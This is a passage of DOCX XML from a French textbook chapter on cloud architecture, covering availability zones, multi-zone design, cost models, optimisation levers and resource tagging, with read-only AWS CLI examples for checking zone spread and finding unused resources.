              </w:rPr>
              <w:t>Rare, panne majeure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="282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Zone de disponibilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Datacenter isolé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Plusieurs par an</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2825"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Instance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3094"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Machine virtuelle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3094"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Fréquente</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="282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Service managé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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API, base</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Latence, quotas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3238500"/>
            <wp:docPr id="82" name="Picture 82"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f80.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId118"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3238500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.80 — Une architecture multi-zone</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une vérification de répartition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Vérifier la répartition sur plusieurs zones</w:t>
        <w:br/>
        <w:t>aws ec2 describe-instances \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --filters "Name=tag:Role,Values=app" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --query "Reservations[].Instances[].Placement.AvailabilityZone" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --output text | tr '\t' '\n' | sort | uniq -c</w:t>
        <w:br/>
        <w:br/>
        <w:t># Une seule zone = point unique de défaillance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une architecture multi-zone coûte plus cher en matériel et en réplication. Ce coût se justifie par un objectif de disponibilité chiffré, pas par principe.</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OBJECTIF DE NIVEAU DE SERVICE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Engagement chiffré, par exemple 99,9 % de disponibilité sur un mois, soit environ 43 minutes d'indisponibilité. Il oriente les choix d'architecture et leur coût.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>70.3 Modèles de coût</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le cloud transforme un investissement en dépense variable. Cette souplesse a un revers : sans suivi, la facture croît sans qu'aucune décision ne soit prise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.259 — Cinq postes de coût</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55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Poste</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="296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Facturation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="349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Piège</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Calcul</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À la seconde ou à l'heure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3498"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Instances oubliées</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="255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Stockage</w:t>
            </w:r>
          </w:p>
        </w:tc>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Au Go-mois</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="349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Instantanés anciens</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Sortie réseau</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Au Go sortant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3498"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Souvent sous-estimé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="255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Requêtes</w:t>
            </w:r>
          </w:p>
        </w:tc>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Au million</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="349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Boucles mal placées</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2556"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Adresses publiques</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À l'heure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3498"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>IP réservées inutilisées</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois commandes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Identifier les ressources non utilisées</w:t>
        <w:br/>
        <w:t>aws ec2 describe-volumes --filters Name=status,Values=available \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --query "Volumes[].{id:VolumeId,taille:Size}" --output table</w:t>
        <w:br/>
        <w:br/>
        <w:t>aws ec2 describe-addresses --query "Addresses[?AssociationId==null]" --output</w:t>
        <w:br/>
        <w:t xml:space="preserve">  table</w:t>
        <w:br/>
        <w:br/>
        <w:t># Suivre la dépense par service</w:t>
        <w:br/>
        <w:t>aws ce get-cost-and-usage \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --time-period Start=2026-09-01,End=2026-10-01 \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --granularity MONTHLY --metrics BlendedCost \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --group-by Type=DIMENSION,Key=SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.260 — Cinq leviers d'optimisation</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52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Levier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="267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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="281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Effort</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3521"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Étiquetage systématique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2676"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Attribution des coûts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2817"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Faible, initial</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="352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Arrêt des environnements hors heures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="267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30 à 60 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="281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Automatisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3521"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Ajustement des tailles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2676"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>20 à 40 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2817"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Mesure préalable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="352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Achats d'engagement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="267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20 à 50 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="281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Analyse de stabilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3521"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Sortie réseau réduite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2676"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Variable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2817"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Architecture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ÉTIQUETER À LA CRÉATION</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Une étiquette ajoutée plus tard ne répartit pas les coûts passés. Appliquez </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>projet</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>environnement</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> et </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>responsable</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> dès la première ressource, et interdisez la création sans étiquettes par politique.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>70.4 Un fournisseur ou plusieurs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le multi-cloud est souvent invoqué pour éviter la dépendance. Il multiplie aussi la complexité opérationnelle : deux réseaux, deux identités, deux supervisions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.261 — Quatre situations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3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Situation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="304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Choix raisonnable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="265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Raison</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3314"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Startup, équipe réduite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
